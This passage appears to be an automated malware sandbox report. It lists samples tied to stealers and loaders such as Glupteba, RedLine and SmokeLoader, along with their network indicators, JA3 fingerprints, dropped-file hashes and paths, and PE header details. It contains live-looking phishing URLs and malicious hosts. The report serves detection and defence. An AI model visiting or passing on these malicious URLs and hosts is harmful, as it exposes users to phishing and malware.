	3XbeWk4htl.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, SmokeLoader	Browse	34.143.166.163
	NBHEkIKDCr.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader, Socks5Systemz	Browse	34.143.166.163
	M6xATHbwxY.exe	Get hash	malicious	Glupteba, RedLine, SmokeLoader	Browse	107.178.223.183
	B843BuO7i3.exe	Get hash	malicious	Glupteba, RedLine, SmokeLoader	Browse	34.143.166.163
	file.exe	Get hash	malicious	LummaC Stealer, Petite Virus, RedLine, RisePro Stealer, SmokeLoader, Vidar	Browse	34.143.166.163
	SyD1FiOG1p.exe	Get hash	malicious	LummaC Stealer, Petite Virus, RedLine, SmokeLoader, Socks5Systemz	Browse	34.143.166.163
	K6DjJpNlzI.exe	Get hash	malicious	LummaC Stealer, RedLine, SmokeLoader	Browse	34.143.166.163
	8as7BA35XQ.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader, Socks5Systemz	Browse	34.143.166.163
	82YWwkVfIS.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader	Browse	34.143.166.163
	file.exe	Get hash	malicious	Glupteba, Petite Virus, Raccoon Stealer v2, RedLine, SmokeLoader	Browse	34.143.166.163
	file.exe	Get hash	malicious	Glupteba, Petite Virus, Raccoon Stealer v2, RedLine, SmokeLoader	Browse	34.143.166.163
	file.exe	Get hash	malicious	Glupteba, Petite Virus, Raccoon Stealer v2, RedLine, SmokeLoader, Socks5Systemz	Browse	34.143.166.163
cream.hitsturbo.com	jcY9CjvBDG.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader	Browse	104.21.46.59
	file.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader	Browse	172.67.168.30
	sCzFNAYGKI.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader	Browse	104.21.46.59
	file.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader	Browse	104.21.46.59
	o7ZHiwiYIJ.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader	Browse	172.67.168.30
	ZRgv8wdMtR.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader, Socks5Systemz	Browse	104.21.46.59
	zEiSxvfImr.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader, Socks5Systemz	Browse	104.21.46.59
	3yPvcmrbqS.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader, Socks5Systemz	Browse	172.67.168.30
	xSLm8YQMXX.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader	Browse	104.21.46.59
	3XbeWk4htl.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, SmokeLoader	Browse	104.21.46.59
	NBHEkIKDCr.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader, Socks5Systemz	Browse	104.21.46.59
	M6xATHbwxY.exe	Get hash	malicious	Glupteba, RedLine, SmokeLoader	Browse	172.67.168.30
	B843BuO7i3.exe	Get hash	malicious	Glupteba, RedLine, SmokeLoader	Browse	172.67.168.30
	file.exe	Get hash	malicious	LummaC Stealer, Petite Virus, RedLine, RisePro Stealer, SmokeLoader, Vidar	Browse	104.21.46.59
	SyD1FiOG1p.exe	Get hash	malicious	LummaC Stealer, Petite Virus, RedLine, SmokeLoader, Socks5Systemz	Browse	104.21.46.59

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	SecuriteInfo.com.Trojan.DownLoader46.43235.24954.653.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.177.134
	trimmed_1703205070_Video.scr	Get hash	malicious	LummaC Stealer	Browse	172.67.155.193
	NFcNdFBTH9.exe	Get hash	malicious	Amadey, LummaC Stealer, RedLine, SmokeLoader, zgRAT	Browse	104.21.24.252
	1vZX9U5Diw.exe	Get hash	malicious	Amadey, LummaC Stealer, RedLine, RisePro Stealer, SmokeLoader, Vidar, zgRAT	Browse	104.21.76.167
	QrHAH5Dt6l.exe	Get hash	malicious	Amadey, LummaC Stealer, RedLine, SmokeLoader, zgRAT	Browse	172.67.197.124
	zFZmNLWVfM.exe	Get hash	malicious	Amadey, LummaC Stealer, RedLine, SmokeLoader, zgRAT	Browse	104.21.24.252
	https://pub-422f33674c4b4fe182123a25dbb97378.r2.dev/secu3.html	Get hash	malicious	HTMLPhisher	Browse	104.18.2.35
	https://iris-translucent-sturgeon.glitch.me/hihi.shtml	Get hash	malicious	Unknown	Browse	172.67.167.75
	https://s-teamg.com/p/wvc-jtrd/vrawqtgf/	Get hash	malicious	Unknown	Browse	172.67.160.103
	https://pub-a576080262554a39803f900047fa70e1.r2.dev/zzinlook.html	Get hash	malicious	HTMLPhisher	Browse	104.18.2.35
	https://steannconnmunitiy.ru/	Get hash	malicious	Unknown	Browse	104.18.42.105
	https://login-chaseccounttr1m.sociuu-demo.com/	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	https://githubmaster3000.github.io/steamClone/	Get hash	malicious	Unknown	Browse	172.64.145.151
	https://cl.s13.exct.net/?qs=3458350539d8dd387ca215f16b349bd246585ad73f6a2ab0b580ef6d4267d76b2f4bf70b0764f2e588f939c14b581cdf	Get hash	malicious	Unknown	Browse	104.18.167.88
	https://pub-953fec6a0a914481b265762be3df6c8a.r2.dev/auth.html	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	https://pub-0daa853ff6a643e9b2dc67a984dc9083.r2.dev/index.html	Get hash	malicious	HTMLPhisher	Browse	104.18.11.207
	https://pub-eeec989a756747bda7bc4110beb93e52.r2.dev/dhsj.html	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	https://pub-3ef6d2942fc441659c2e93705c031e0f.r2.dev/bool.html	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	zB6UeFurbf.exe	Get hash	malicious	Amadey, LummaC Stealer, RHADAMANTHYS, RedLine, SmokeLoader, zgRAT	Browse	104.21.24.252
	https://pub-d8469d9b24cb4771bc45ece2929a5756.r2.dev/kom.html	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
ATGS-MMD-ASUS	https://iris-translucent-sturgeon.glitch.me/hihi.shtml	Get hash	malicious	Unknown	Browse	34.149.155.70
	https://1drv.ms/b/s!Aj_dAsJOtS3GeKVcEaa61wq6boU?e=TSuYkW	Get hash	malicious	Unknown	Browse	34.160.144.191
	jcY9CjvBDG.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader	Browse	34.143.166.163
	file.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader	Browse	34.143.166.163
	sCzFNAYGKI.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader	Browse	34.143.166.163
	ZhhHfkNewm.elf	Get hash	malicious	Mirai	Browse	48.178.171.14
	4F5W85YGoU.elf	Get hash	malicious	Mirai	Browse	48.51.177.90
	lo8cGX1gZM.elf	Get hash	malicious	Mirai	Browse	34.143.68.121
	file.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader	Browse	34.143.166.163
	https://finance369.com/fztbnt/?66730191	Get hash	malicious	Unknown	Browse	34.150.170.96
	86O41HaCl5.elf	Get hash	malicious	Mirai	Browse	48.21.211.76
	Ma4NfFTyMr.elf	Get hash	malicious	Mirai	Browse	57.134.45.141
	CuruFoiJiK.elf	Get hash	malicious	Mirai	Browse	57.147.18.70
	o7ZHiwiYIJ.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader	Browse	34.143.166.163
	RainViewer-Premium-v3.6.3_build_14259-Mod.apk	Get hash	malicious	Unknown	Browse	34.160.223.119
	RainViewer-Premium-v3.6.3_build_14259-Mod.apk	Get hash	malicious	Unknown	Browse	34.160.223.119
	ZRgv8wdMtR.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader, Socks5Systemz	Browse	34.143.166.163
	https://khradifmadina.blob.core.windows.net/khradifmadina/url.html#cl/1981_md/1110/3113/675/29/234450	Get hash	malicious	HTMLPhisher	Browse	34.141.137.168
	https://article.barksnomore.com/bark-reform-vl/?cep=Hi1NB3hb1eETlCMxFF6Hd4-_AsC6kDen8OL6m_Ea0GeJgDdR5yVDq5uLxbnQGvRbjshNl3_JrO13qnXxBNXzl5xSuaT5wbi9K7ruiL-K0zfTtH4mutpwVIa5JJerp5WBif4s9DJLVBIeWlPxDQY03dz7ABnh3jDX7rnxzRnz6TEsgn3B7RfGpYN4uCKkU1-AQY0sbuYj3Gxch7dZUf2cfMIgMLUJubR2i5VwfUmA69NQjWyAv9ZCVWuFVXyPql44VJoZ-zDXkAkoR47sZySoYC3t5ST-JbNdlyVa61eI98HHHoZ4co78GJa3rTNahsqFAjlJCqrofz6NO6vFh8onv9Upfjs3yycyrZmYqiZxEdwzyaYOKCJuGQZ9xoy0JLIFvpgXxIdJEUJApqxaqn-nGDyVydBeQsuOEXrkbEQ1jAWG8QyEpt30JIZnh39r7MehsK4WFKY_tD2DOL-Ywx2kGFQMGK5VcTSYPYYjOWG4bJAhHksOn8TnuZcubDRlswT3-Q6m3RFkTlTFMDS2j1kY8BLzc3R3dajuwwPW5uAAuTjFapLiAKf0pDnVeY8Q1Pz8FBuClrupmWuUfLuM7XMygtzA_C9umC74beMXvE-VRl_wlKWk0VFqExagucLaDAfoE4o4A5br7jk7OKjpeVwH52Rj49N3b4Qet9c5Nkbr4wDpQ6KCXQzofhOhtxi6jjJ-_JdzSMLMMidcTpGmJdqb5znRu6MWVm0hORcVU0-cDJiZDLER4hPti8jR0WD79FnnxAnwtKODg3dtfJMG03aapcvYN_In9_TBcmBcW6AMtsU&lptoken=1723035110ad048f75f2&site=yahoo-home&site_id=1551771&title=Do+This+To+Stop+Your+Dog's+Barking+-+Works+For+All+Breeds&platform=Desktop&campaign_id=31821115&campaign_item_id=3883976247&thumbnail=http://cdn.taboola.com/libtrc/static/thumbnails/41137d83424b6c8b8363711776dc79a8.jpg&click_id=GiDnWzesQtvJXSOEHTBP1NpNUfi2W4eIQ7x4XShlFZVqOiCc_WEoqqHT37DJ891w&tblci=GiDnWzesQtvJXSOEHTBP1NpNUfi2W4eIQ7x4XShlFZVqOiCc_WEoqqHT37DJ891w	Get hash	malicious	Unknown	Browse	34.149.114.185
	AJKXCXCD.exe	Get hash	malicious	Neconyd	Browse	34.41.229.245
DFRI-ASForeningenfordigitalafri-ochrattigheterSE	file.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader	Browse	171.25.193.9
	sCzFNAYGKI.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader	Browse	171.25.193.9
	file.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader	Browse	171.25.193.9
	zEiSxvfImr.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader, Socks5Systemz	Browse	171.25.193.9
	01b9T4tDdG.exe	Get hash	malicious	Glupteba, LummaC Stealer, RedLine, RisePro Stealer, SmokeLoader	Browse	171.25.193.9
	SaLY22oLht.exe	Get hash	malicious	Unknown	Browse	171.25.193.9
	SyD1FiOG1p.exe	Get hash	malicious	LummaC Stealer, Petite Virus, RedLine, SmokeLoader, Socks5Systemz	Browse	171.25.193.9
	http://171.25.193.25	Get hash	malicious	Unknown	Browse	171.25.193.25
	file.exe	Get hash	malicious	RedLine, SmokeLoader, Stealc	Browse	171.25.193.9
	file.exe	Get hash	malicious	RedLine, SmokeLoader, Stealc	Browse	171.25.193.9
	file.exe	Get hash	malicious	RedLine, SmokeLoader, Stealc	Browse	171.25.193.9
	file.exe	Get hash	malicious	RedLine, SmokeLoader	Browse	171.25.193.9
	Ma0hVedIX4.exe	Get hash	malicious	RedLine, SmokeLoader	Browse	171.25.193.9
	Bznx8G6dMz.exe	Get hash	malicious	RedLine, SmokeLoader	Browse	171.25.193.9
	file.exe	Get hash	malicious	RedLine, SmokeLoader	Browse	171.25.193.9
	file.exe	Get hash	malicious	RedLine, SmokeLoader	Browse	171.25.193.9
	file.exe	Get hash	malicious	BitCoin Miner, RedLine, SmokeLoader	Browse	171.25.193.9
	rgTRPlTmIt.exe	Get hash	malicious	RedLine, SmokeLoader	Browse	171.25.193.9
	klWGq3yDcQ.exe	Get hash	malicious	Unknown	Browse	171.25.193.9
	file.exe	Get hash	malicious	Unknown	Browse	171.25.193.9

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	NFcNdFBTH9.exe	Get hash	malicious	Amadey, LummaC Stealer, RedLine, SmokeLoader, zgRAT	Browse	172.67.215.49 104.21.88.149
	1vZX9U5Diw.exe	Get hash	malicious	Amadey, LummaC Stealer, RedLine, RisePro Stealer, SmokeLoader, Vidar, zgRAT	Browse	172.67.215.49 104.21.88.149
	QrHAH5Dt6l.exe	Get hash	malicious	Amadey, LummaC Stealer, RedLine, SmokeLoader, zgRAT	Browse	172.67.215.49 104.21.88.149
	zFZmNLWVfM.exe	Get hash	malicious	Amadey, LummaC Stealer, RedLine, SmokeLoader, zgRAT	Browse	172.67.215.49 104.21.88.149
	zB6UeFurbf.exe	Get hash	malicious	Amadey, LummaC Stealer, RHADAMANTHYS, RedLine, SmokeLoader, zgRAT	Browse	172.67.215.49 104.21.88.149
	7ykYy4WbzK.exe	Get hash	malicious	Amadey, LummaC Stealer, RHADAMANTHYS, RedLine, SmokeLoader, zgRAT	Browse	172.67.215.49 104.21.88.149
	https://indd.adobe.com/view/9775d62a-375d-437a-ae37-07f3cdb0f988	Get hash	malicious	Unknown	Browse	172.67.215.49 104.21.88.149
	Ref_122023e.exe	Get hash	malicious	DBatLoader	Browse	172.67.215.49 104.21.88.149
	Ref_122023e.exe	Get hash	malicious	DBatLoader	Browse	172.67.215.49 104.21.88.149
	U1MiP25NrU.exe	Get hash	malicious	Amadey, Glupteba, LummaC Stealer, RedLine, SmokeLoader, Stealc, Vidar	Browse	172.67.215.49 104.21.88.149
	apphelp2.exe	Get hash	malicious	Nighthawk	Browse	172.67.215.49 104.21.88.149
	jcY9CjvBDG.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader	Browse	172.67.215.49 104.21.88.149
	sCzFNAYGKI.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader	Browse	172.67.215.49 104.21.88.149
	file.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader	Browse	172.67.215.49 104.21.88.149
	file.exe	Get hash	malicious	PrivateLoader	Browse	172.67.215.49 104.21.88.149
	file.exe	Get hash	malicious	Amadey	Browse	172.67.215.49 104.21.88.149
	https://indd.adobe.com/view/be1ed649-9b2d-47be-a18f-b5ae707a9ba7	Get hash	malicious	Unknown	Browse	172.67.215.49 104.21.88.149
	G9rPCOOUlU.exe	Get hash	malicious	Amadey, LummaC Stealer, RedLine, SmokeLoader, zgRAT	Browse	172.67.215.49 104.21.88.149
	SecuriteInfo.com.Win32.SpywareX-gen.21740.30024.exe	Get hash	malicious	Remcos, DBatLoader	Browse	172.67.215.49 104.21.88.149
	o7ZHiwiYIJ.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader	Browse	172.67.215.49 104.21.88.149
83d60721ecc423892660e275acc4dffd	jcY9CjvBDG.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader	Browse	217.160.114.209 51.15.246.170 198.50.191.95 204.13.164.118
	sCzFNAYGKI.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader	Browse	217.160.114.209 51.15.246.170 198.50.191.95 204.13.164.118
	file.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader	Browse	217.160.114.209 51.15.246.170 198.50.191.95 204.13.164.118
	o7ZHiwiYIJ.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader	Browse	217.160.114.209 51.15.246.170 198.50.191.95 204.13.164.118
	zEiSxvfImr.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader, Socks5Systemz	Browse	217.160.114.209 51.15.246.170 198.50.191.95 204.13.164.118
	xSLm8YQMXX.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader	Browse	217.160.114.209 51.15.246.170 198.50.191.95 204.13.164.118
	3XbeWk4htl.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, SmokeLoader	Browse	217.160.114.209 51.15.246.170 198.50.191.95 204.13.164.118
	NBHEkIKDCr.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader, Socks5Systemz	Browse	217.160.114.209 51.15.246.170 198.50.191.95 204.13.164.118
	M6xATHbwxY.exe	Get hash	malicious	Glupteba, RedLine, SmokeLoader	Browse	217.160.114.209 51.15.246.170 198.50.191.95 204.13.164.118
	file.exe	Get hash	malicious	LummaC Stealer, Petite Virus, RedLine, RisePro Stealer, SmokeLoader, Vidar	Browse	217.160.114.209 51.15.246.170 198.50.191.95 204.13.164.118
	SaLY22oLht.exe	Get hash	malicious	Unknown	Browse	217.160.114.209 51.15.246.170 198.50.191.95 204.13.164.118
	SyD1FiOG1p.exe	Get hash	malicious	LummaC Stealer, Petite Virus, RedLine, SmokeLoader, Socks5Systemz	Browse	217.160.114.209 51.15.246.170 198.50.191.95 204.13.164.118
	K6DjJpNlzI.exe	Get hash	malicious	LummaC Stealer, RedLine, SmokeLoader	Browse	217.160.114.209 51.15.246.170 198.50.191.95 204.13.164.118
	8as7BA35XQ.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader, Socks5Systemz	Browse	217.160.114.209 51.15.246.170 198.50.191.95 204.13.164.118
	82YWwkVfIS.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader	Browse	217.160.114.209 51.15.246.170 198.50.191.95 204.13.164.118
	file.exe	Get hash	malicious	RedLine, SmokeLoader, Stealc, Vidar	Browse	217.160.114.209 51.15.246.170 198.50.191.95 204.13.164.118
	file.exe	Get hash	malicious	RedLine, SmokeLoader, Stealc, Vidar	Browse	217.160.114.209 51.15.246.170 198.50.191.95 204.13.164.118
	file.exe	Get hash	malicious	RedLine, SmokeLoader, Stealc	Browse	217.160.114.209 51.15.246.170 198.50.191.95 204.13.164.118
	file.exe	Get hash	malicious	RedLine, SmokeLoader, Stealc	Browse	217.160.114.209 51.15.246.170 198.50.191.95 204.13.164.118
	file.exe	Get hash	malicious	RedLine, SmokeLoader, Stealc	Browse	217.160.114.209 51.15.246.170 198.50.191.95 204.13.164.118

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\2788.exe	jcY9CjvBDG.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader	Browse
	file.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader	Browse
	sCzFNAYGKI.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader	Browse
	file.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader	Browse
	27i42a6Qag.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader	Browse
	o7ZHiwiYIJ.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader	Browse
C:\ProgramData\Drivers\csrss.exe	jcY9CjvBDG.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader	Browse
	file.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader	Browse
	sCzFNAYGKI.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader	Browse
	file.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader	Browse
	27i42a6Qag.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader	Browse
	o7ZHiwiYIJ.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader	Browse

Process:	C:\Users\user\AppData\Local\Temp\2788.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2017792
Entropy (8bit):	7.882413889771764
Encrypted:	false
SSDEEP:	49152:itCW0MSJfxkfBNec7L3jdHWNefneKAIBvxlRF1E:itz0MiOfbD79HWNeeKDtn1
MD5:	EE1049D8F8248D11080582FE27F96843
SHA1:	6701BA82ECE6878C61FCE5204DEF8EFDC28822AB
SHA-256:	F3C70EC32049139737226C85A87D453AC98C6A0FFC7747BA4F65118A1B8EF670
SHA-512:	F8DB9E2E7E0DEC1F95B83E52F67B15C0E93FCBA0801D220DB43C23D732A2BB298E986FD65493019F3FED9BBC840032FF5F5C9AE3DF6A025C596622B34757DEA6
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 70%
Joe Sandbox View:	Filename: jcY9CjvBDG.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: sCzFNAYGKI.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: 27i42a6Qag.exe, Detection: malicious, Browse Filename: o7ZHiwiYIJ.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...............................................................................................................................PE..L......c.............................Y....... ....@..........................@.......u..........................................<....@...............................................................4..@............................................text............................... ..`.data........ ......................@....rsrc........@......................@..@................................................................................................................................................................................................................................................................................................................................................................................................

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2224
Entropy (8bit):	5.354902188542171
Encrypted:	false
SSDEEP:	48:CWSU4xymI4RfoUeW+gZ9tK8NPdMs7u1iMuge//MaOUyu0lhV:CLHxvIIwLgZ2KlDOugQ01
MD5:	C7A635486165B52E58498D80B2C13470
SHA1:	E184B3A4D9F622C4AA7590B967D4C17FB12DEF0E
SHA-256:	1E12A1CB63405C3644A9A778AF041C778931AF498BB3015D32D3F250BE5D01CB
SHA-512:	EEA6C1DC1AD41A5EF7AE12DD0497A474293D2EA8EDF82C21F5C26704474DB35BEA0F39FD0504F3F3211418B9D75A71F97F72F7ED48381C75156675BD0AB4104B
Malicious:	false
Preview:	@...e...........................................................P................1]...E.....m.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...\|...........System.Configuration4.................%...K... ...........System.Xml..L.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2017792
Entropy (8bit):	7.882413889771764
Encrypted:	false
SSDEEP:	49152:itCW0MSJfxkfBNec7L3jdHWNefneKAIBvxlRF1E:itz0MiOfbD79HWNeeKDtn1
MD5:	EE1049D8F8248D11080582FE27F96843
SHA1:	6701BA82ECE6878C61FCE5204DEF8EFDC28822AB
SHA-256:	F3C70EC32049139737226C85A87D453AC98C6A0FFC7747BA4F65118A1B8EF670
SHA-512:	F8DB9E2E7E0DEC1F95B83E52F67B15C0E93FCBA0801D220DB43C23D732A2BB298E986FD65493019F3FED9BBC840032FF5F5C9AE3DF6A025C596622B34757DEA6
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 70%
Joe Sandbox View:	Filename: jcY9CjvBDG.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: sCzFNAYGKI.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: 27i42a6Qag.exe, Detection: malicious, Browse Filename: o7ZHiwiYIJ.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...............................................................................................................................PE..L......c.............................Y....... ....@..........................@.......u..........................................<....@...............................................................4..@............................................text............................... ..`.data........ ......................@....rsrc........@......................@..@................................................................................................................................................................................................................................................................................................................................................................................................

Process:	C:\Windows\servicing\TrustedInstaller.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with CRLF, LF line terminators
Category:	modified
Size (bytes):	6619136
Entropy (8bit):	5.2549920265573515
Encrypted:	false
SSDEEP:	49152:KV5tI95Vr3lchlh6lRdKNhFk15Nh9xV+9JV:V3l
MD5:	87ABC15A55E1F6D0D7F0564DEB34E7D5
SHA1:	130E6B3AF83FF857175E1510404AA66899481003
SHA-256:	A1213BE82C0F41F4DBB8C86EF1D617F8D8EEB25935D91DC7E40775E68339907F
SHA-512:	A369FE444B38F09AD29755DF1E4AA9596BDD011BAEEE1AFEA3565D413B0719F0E00E5D6C7BF811012A2314875DFA2ACC1A0E9426FA56233B7A9502665101A2AF
Malicious:	false
Preview:	.2023-10-03 09:57:33, Info CBS Starting TiWorker initialization...2023-10-03 09:57:33, Info CBS Lock: New lock added: TiWorkerClassFactory, level: 30, total lock:2..2023-10-03 09:57:33, Info CBS Ending TiWorker initialization...2023-10-03 09:57:33, Info CBS Starting the TiWorker main loop...2023-10-03 09:57:33, Info CBS TiWorker starts successfully...2023-10-03 09:57:33, Info CBS Lock: New lock added: CCbsWorker, level: 5, total lock:3..2023-10-03 09:57:33, Info CBS Universal Time is: 2023-10-03 08:57:33.888..2023-10-03 09:57:33, Info CBS Loaded Servicing Stack v10.0.19041.1940 with Core: C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1940_none_7dd80d767cb5c7b0\cbscore.dll..2023-10-03 09:57:33, Info CBS Build: 19041.1.amd64fre.vb_release.191206-1406..2023-10-03 09:57:33

Entrypoint:	0x403e9c
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x6420DBDE [Sun Mar 26 23:57:18 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	957bb2f4e83d79445f53e975ad73682f

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x29c88	0x50	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x44c000	0xf270	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x271d0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x28ff8	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x27000	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x25632	0x25800	False	0.7740690104166666	data	7.382127737137534	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x27000	0x351e	0x3600	False	0.36812789351851855	data	5.210718452226409	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x2b000	0x4207b8	0x1800	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x44c000	0xf270	0xf400	False	0.3412365522540984	data	4.145142546816051	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

